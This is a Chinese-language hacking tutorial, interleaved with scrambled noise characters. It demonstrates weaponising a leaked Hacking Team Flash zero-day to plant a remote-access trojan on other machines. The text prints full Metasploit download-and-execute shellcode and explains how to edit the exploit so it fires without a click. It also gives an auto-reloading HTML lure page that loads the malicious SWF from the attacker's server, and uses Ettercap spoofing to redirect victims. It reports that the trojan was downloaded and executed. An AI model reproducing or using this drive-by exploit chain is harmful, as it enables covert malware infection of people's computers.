|
; Z% R7 e, U8 {# P4 ], Z3 y 三、flash 0day之手工代码修改制作下载者实例入侵演示 6 v7 ^ e. H5 i
& }6 f* j% k* ^& g* v$ L, T
* [! j$ D: O; V+ Y) W$ I( J 利用到的工具:
2 p' `& A+ [; y" d% w; ^! y" V3 `
* ? ?" `/ S+ Z0 x' Y
. I1 B. B$ o3 j0 o Msf
m) P% a& ^, R2 i- ?: T/ i ; ], ?; g# P2 W1 w8 A* l
; N' o3 J! S6 E6 H Ettercap / C& p1 Q) L5 N4 l
( P# s! B3 r0 \/ a
4 T( |, [+ ]% P8 l" t% n" d3 y
Adobe Flash CS6 4 W/ f ^+ l6 u7 Z
* c' @1 f9 K5 P4 V& B, W1 [8 B. {1 l3 D0 a, f
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
k" ~4 _1 H8 o- ~ 1 {! `0 y( \2 T" B- y4 y
. t$ I" E6 I, |+ L 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
; ~0 Z) k4 c0 D9 ^/ ~& r# D 2 A5 v* y& J6 L, d
/ H Q8 J* ]" g, B 如图:
4 y4 B- E5 v! A% l ( h6 [/ R: q* d. I. P
E5 w& q( f1 F- R9 b
4 |+ M0 t* F Q8 E9 j
& g/ V3 A, K6 K( m/ X( P: z+ O! ?+ K! o
- F6 W! t9 V/ e8 O4 L1 c
! B0 P% G3 r3 P/ x9 u, ]: C" | 2 U& `' D0 J3 b- Y
6 \9 [- w7 o8 |, {% L% w 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
/ B ~; B7 y7 n, Q 6 @2 B5 D- e! t# R. j& M
$ h' F* T: {% }+ n+ p( S
6 p2 e9 r8 m8 w! s; O3 G* |
# |. p% O' Q0 M/ o( _" }: a8 _
4 _6 f" ?. B* |4 D5 F: G8 X
" y8 V5 W6 c6 z8 T w
' [! a/ g3 F& V7 K4 v+ G# H 然后执行generate -t dword生成shellcode,如下:
$ W1 Q5 W2 u- C: h : l# N# O2 h, C" N5 ^4 j
6 @* Q ]: S8 j4 I6 }
5 g b& K% P8 \8 @ | 7 \. ~- W) q8 I8 o6 a- } l
! }2 y! ~% d* S' V2 [5 t5 x6 H( L
复制代码到文本下便于我们一会编辑flash exp,如下:
. |) D P, w. r/ ~6 L b# Y " g. w; c$ v* c! p5 |* |0 ?
- Y" r& k; t& ~$ g2 Q. C8 x) j
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, + N# j4 e! p7 F+ d( E
! N C) t0 }3 B; |# J4 H8 ^! d& C' P
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, r0 z8 j6 Y8 v ]/ g
7 K+ x% E$ l) H7 @
% H. r+ k J- S5 e0 Y9 z: b
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, C' t. F9 Y! M
9 r1 }- N0 p$ w% A9 i; K
, D' O- S9 o5 B* U
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
4 l8 H* \/ r3 n+ e7 V. w 6 k+ S: @6 b0 |0 e% A* M7 Q
! @0 g; R9 a8 r
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
5 D, G2 a7 m7 }' b* a& t# x
! Y) ^' X6 }* H3 {( ]" P% g
) _7 C W4 O$ X7 u0 T; [ 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
% O, b2 z) }0 G
S# I$ {5 {0 z7 o @
3 l3 @) q1 w5 ^3 r 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 9 ?0 h/ j/ A. z6 }
2 a2 [1 ?; D, K3 v
2 N4 H6 E9 Y3 p. E: \
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, J( t7 K* L% R# S. c/ Y
4 B1 E4 z/ P6 S5 Q5 l
M: V; I" e# [! Q 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
* Q, H4 q* b0 H& _. x/ N( S 6 M' I6 ?: Z% M+ q9 n
n! E* k2 y8 b0 l 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
+ H `" k( i% y0 f7 M ( K2 @1 }) t! ~+ o. o
$ @- e- Q) ~- F, K5 { y 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, , ~3 r. b& }" w2 k' g5 O9 I" G
, U/ H6 F; n3 m' U( a
. y4 t9 i- f6 G$ {2 \# Q( k 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, " q- Q2 j0 ?' g1 O. ?
1 C# u' \2 i- p" n5 ^# A1 ^7 ~
" _; H5 Q2 @' y# h7 H1 y' b) S0 ?
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
6 G. z9 d: l& K, t ( m Q- R/ ?7 o2 {
' }' p3 Q$ R0 J( r" d
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 $ _: t7 m3 H* N- |7 s
1 b2 d$ C; W& f
- l) V" B. C0 W! f6 j) g
5 Z# _' I( }0 {6 K
$ O+ a" [& m' C- ?5 |& B# y- o, d% Y, n4 y2 j7 A9 k9 Z
5 ]! L3 ?8 A, e# R: v: c4 [
& u* w+ f3 n. V2 l+ F( ~ w5 U O9 [, A3 Q
下面我们来修改flash 0day exp,需要修改三个文件,分别为: 8 V. R3 m* _- D! `" D
! u6 p0 D8 M0 i" y: |) F0 q
* y6 P% i" v. \2 b; s$ W 8 A" I$ i9 a5 d+ g, J+ [
2 U# e/ H# y0 `! i3 i) D8 m$ j B
) `! \- z% c5 ~; L 先修改ShellWin32.as,部分源代码如图: * F F% M, ?* B/ F
2 k% @/ T% F n' \
0 S- c5 h: a! q! |" C( ?& \: V 1 v# |% A, q" S4 r8 E: g- K
" T' h5 @! l Q3 d' O! E W
1 a9 ?) x3 ^- L3 h* |* W 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 6 w' Y) G) S, J5 b9 A& [, ^
. f; S3 _- S5 Y0 {& K D4 ^* K6 u/ d5 {6 X1 \
: W/ _) e+ n' w2 ~' C# C+ o8 G9 b$ |
' I# u2 P; D7 ~& M. g+ D) `/ s6 M
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ! I; U1 v4 b) u( s
0 u" ~9 E/ c1 Z+ \+ S5 H0 P8 E
, Y! Z* P$ S/ ~3 b! ^! Q
; l4 Y* K6 b9 i+ h: v$ i. v Z
- D2 A0 D9 W6 {, [; G) ? 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
4 @, r/ Y6 W7 H) g# u
2 U. p3 q& I" o2 d: k/ C5 Q- K
2 E2 S" P2 A- W& `
; [7 @+ W- F7 P2 M8 N& ?
- M+ A& H: l$ v5 |1 M
4 N, D. `" A n1 O8 \) Y7 E
$ O7 g; P! i$ L9 y1 X5 N8 W2 f; G3 O
, O9 M1 [) G! C4 r3 Z 9 _. p3 `1 @6 {' b* R0 z
- V F, } z$ M9 A 然后点保存,下面我们来编译一下,打开
. w" M( {3 T, S. o! R
( T7 y# P7 f, C6 F# L: Z6 y- b2 |( j" E& ~3 V8 I
exp1.fla然后点文件-发布,看看编译没错误
5 D7 X1 Y1 m e2 u
, t! Y; R. t. X% g# Y$ `2 I3 g
0 c# L: i+ ~, r# U6 D! Q
9 P# ~* f! N! y% {( A( Z, B, u + f- E/ |6 J% m" N3 T! c
+ p! } y2 ]: ?6 Y" V7 ]! E
& v P( ~) {# T9 b& t % I- W, `- `) K, J* F9 L0 m7 M
7 q: R8 b6 Z- m1 @1 ?* T & \* a) N/ {8 A6 ^
* L) g5 j" i* b1 J& J
+ [' a7 `4 q. X& C7 `) A
9 f' W9 |, I6 l- w" I ( X+ W+ z5 b2 R7 s+ l3 c
2 h s+ n3 [& i
然后我们把生成的
, g* C0 u2 @4 R" h/ O) d . ]2 t9 o6 S9 b1 |" j3 N8 `
0 o) k1 G' Q" Z- d9 b
exp1.swf丢到kailinux 的/var/www/html下:
+ x, O- F$ Z; C0 Q( U
) n0 A! ~. e% l9 f5 v. J
* P& l1 x5 T5 k5 k# ] 然后把这段代码好好编辑一下 - F! K$ F x" O$ ?; v$ r
+ T8 B1 U# X; E G6 K! u" l5 e$ D1 A/ ~" V2 w
% n* v/ x1 P0 B$ L: ^8 e# h
3 U5 }& s8 F! N" t+ T5 V1 d4 h' b5 Q! m" K
0 W' v( i" J2 O1 y$ I" S4 V9 ]
5 V1 h) l) }$ d& Y# @2 `
& i: A$ z: Q7 j0 i6 j + k8 q' i2 P4 \0 \! e7 [5 S
. l$ M! e' _, e$ v) G: I% e5 S8 n6 M0 `. v4 y4 t2 k
4 d: g6 }, G5 e6 R
1 F, I: w- v6 e4 {/ k. ~0 b4 i9 ^# M' @3 w, ^/ X T* x' w
6 [# C2 v3 W8 [- k+ m 2 a4 F7 T Y2 v# x* I0 C/ B
! Z0 Y$ b7 x4 }. n ; ~( z* T, V' Z" I8 a
1 ~* E/ x- l( p: G# k( u2 d( P+ X9 b
3 c: p1 i% k G H) g9 ]
<!DOCTYPE html>
9 ]+ F2 x. W" @4 X; T. ~* U
) T N' o6 ~* C7 \. \ C. Z/ o6 a2 u& t7 o
<html> ! n- F" \0 \- s7 q% T9 T! q' K
8 w2 n3 k( O' G+ X+ p: b- `, ?6 [0 O5 q& W
<head> ) g( f; ?5 P+ g- l" D. t# x4 @
) K0 G: R, a3 V/ @# ]! K- M
7 `* f. B7 r3 @6 V# _5 m <meta http-equiv="Content-Type" content="text/html;
! T& i4 @/ S; {: _( F7 [% M E8 C( u' B! M% N
1 j( c8 X/ E+ n charset=utf-8"/> 0 h; e$ ? n* q2 j ?5 ~3 x
& ^. _/ r, ^9 V2 {; f7 n$ t$ |. I! Z
</head> # Y1 N- A% x& E9 `: X: x3 ?
9 ^4 q |9 {# V- A) M; H2 o( b. M
* c7 I4 Y! [$ e# R8 b4 x
<body>
) J, E! V& ]8 `7 ?8 t4 J! z! S( W
0 d5 V O2 x4 F% V0 }
8 I1 L6 t# N; q; r9 n" {- K+ Y7 n <h2> Please wait, the requested page is loading...</h2> % c8 \* t" V* z/ T3 M- Z1 b
4 V* {9 V0 i6 u
' [3 c2 b+ P$ y- i+ B
<br> 8 G; Q' H* n9 Y0 w
. u2 W; l8 @$ x. z* U' g2 [
" Y X% s9 r$ v" `* M% {( T! n <OBJECT 0 m' U/ z4 Y( U0 v1 e% c# \( w
7 J9 E( j0 Y+ b8 L
7 j- Z- c" J# P classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie ( O+ b# R+ }# n, t/ D! \- P
; P* b8 k0 j) x! }6 K0 R: c9 e
1 u; O' o) l7 m% w9 ~) y
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> . [( z, x6 G, Y5 i6 Q. u3 ]2 a
* X5 W" t% @2 F+ s i2 K
. ]: Q' d- {: O# _3 E7 |0 i# j1 h </body>
; J5 M. P$ ]% t3 F ]; ~; H2 ]% u" i, X) R0 b
3 u) f" i2 n0 `2 a! @( h <script>
( F8 h" U8 m" q' U1 S! \2 ^. F3 Y
( a6 T; |6 X/ C1 A- g1 i4 P5 T$ i) ]- }/ H) ?/ G4 t/ u) N
setTimeout(function () { + Y% i8 }; {: L* y
8 S3 [$ F+ `$ K, d
( B/ L7 h( {' J
6 a% C) X$ F0 |$ V* \ / A& J( e+ C, w& i+ }& d& B
; \9 n' Y: y) f3 z; x window.location.reload(); * M p9 Q% F1 R& G7 F
O7 d1 r9 T) \: r" c
. S) [3 t! @# E6 M
}, 10000);
) T' \0 \" z- k! E1 T
! ]: _' v0 [% Y" }- x Y8 G4 z+ b" y( p3 O
6 h3 w" p) k8 w9 M% L9 {- A, K
- [7 _% h T* u* f/ x7 I g+ x( [' W1 g( o) H+ X4 { P
</script>
, c( {! r5 f( a6 U 2 x& a9 n; M; y3 K3 }% \+ v/ }; |5 h
, C- W; G b X) V9 e3 m# y3 x& r
</html>
3 h7 k" A9 o' Z
" m+ ]7 d; r+ O0 P9 t0 T& N8 Q4 ~" X& [' L/ L
$ `' w* I9 V2 c7 K& c+ T- o
: w3 o1 y3 ^- c& o2 u7 b* s, f3 `/ D2 W) W( u6 u
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
# _8 g$ N" s# Y4 M' n
5 B/ X) M- V( Z' z, G
- \$ q1 s! R+ v. P/ X6 Q
: t& d. ]* Y6 n X 6 N7 u/ i2 G1 A# G5 {
$ y8 s' V0 w0 J
- M4 q/ H7 A, c! ^& q& x ' E" L/ n& z1 d: U! g' Q
8 P$ `; V5 Q* o( Q 9 t I- K$ S Y& }$ [8 w& m
; }8 Q9 U/ [3 a/ ]6 M' z; k+ B! \: r8 I
9 E; _# k8 F7 c9 [
! N- H3 v. a( P9 w/ M
+ L' H# l+ o6 D+ `' L8 F( b9 N }' o 5 G8 Z& G2 ?6 w. s
$ @0 _9 @8 E1 A, [* l
" ^$ _- u7 C8 l: h$ s ^ 下面我们用ettercap欺骗如图:
9 D" W, o3 i) { ) F+ I; l- _# [# X
* l: Z" Q, t2 y4 F1 r5 O
' `0 }2 R9 z: P4 q+ u) o
/ p1 @% v0 u" w6 w; k5 d9 k3 Q4 S2 t6 g' X8 w, [$ A
! q2 W8 z$ ?0 a: D2 k+ D
5 X( r9 L4 ]8 i8 o5 Y
4 V6 `) W( R$ \* k# o7 q# Q 下面我们随便访问个网站看看:
+ f' g1 ~: ~8 B, s
& Q3 L% J7 n1 v) E A5 [* ?+ w, z. ]8 o
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
# Z, \& R. e0 [! }1 Q! v % O6 y$ ^7 z* _- A$ T6 F2 f6 `# y
& L7 x5 E5 D+ ]& R0 Y
2 n* X8 P, E Q$ f! m' z ! W1 \8 s1 D7 K
[9 K* C' K5 a 我们看另一台,
1 z1 Y% T- P: f/ a, T+ o& f) z+ E
& @9 J( m" {+ g
7 {6 Y9 n# L% L* `! @$ y 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 & T2 k. [% Q6 Q6 @5 E
|